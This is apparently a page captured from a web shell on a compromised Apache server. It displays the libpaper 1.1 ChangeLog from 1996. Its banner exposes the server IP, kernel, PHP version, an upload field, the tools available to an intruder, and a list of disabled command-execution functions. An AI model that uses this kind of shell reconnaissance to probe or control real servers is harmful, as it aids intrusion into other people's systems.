| Server IP : 101.53.144.229 / Your IP : 216.73.216.104 Web Server : Apache System : Linux host.gdigitalindia.in 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : digitalshiksha ( 1179) PHP Version : 5.6.40 Disable Function : eval,show_source,system,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,dl,show_source,curl_multi_exechellcmd, ini_restore,apache_get_modules,get_cfg_var,passthru, exec ,proc_get_status,fpassthru,c999_buff_prepare,c999_sess_put,c99_buff_prepare,c99_sess_put,proc_close,ini_alter,dl,symlink,link,proc_close,ini_alter,dl,symlink,link,mail MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /usr/share/doc/libpaper-1.1.24/ |
Upload File : |
Tue Sep 24 06:38:34 Yves Arrouye <arrouye@marin.sevy.fr> * completed the set of manual pages. * added the libpaper.so.1 link in installation. * added -E to less flags. Tue Aug 13 19:14:51 1996 Yves Arrouye <arrouye@marin.sevy.fr> * abstract interface (struct paper hidden) so that future changes can be made safely. * stores dimensions as double, still in PS points. Sun Aug 11 15:16:46 1996 Yves Arrouye <arrouye@marin.sevy.fr> * lib/paper.c: added paperinit(), paperdone(), paperfirst(), paperlast(), papernext() and paperprev(), removed papertable(). * lib/paper.h: added new prototypes. * src/paper.c: added -N option. Removed trailing spaces in what is printed. * examples/gsfrontend.c: corrected PAPERSIZE to PAGESIZE. * examples/a2ps: added calls to paperinit() and paperdone(), added agressive page size selection at printing time. Sat Jul 20 10:15:49 1996 Yves Arrouye <arrouye@marin.fdn.fr> * Makefile.in: changed for PAPERSIZE. * lib/paper.c: added the PAPERSIZE environment variable. * examples: new directory containing examples (gs.sh and diffs for a2ps-4.3).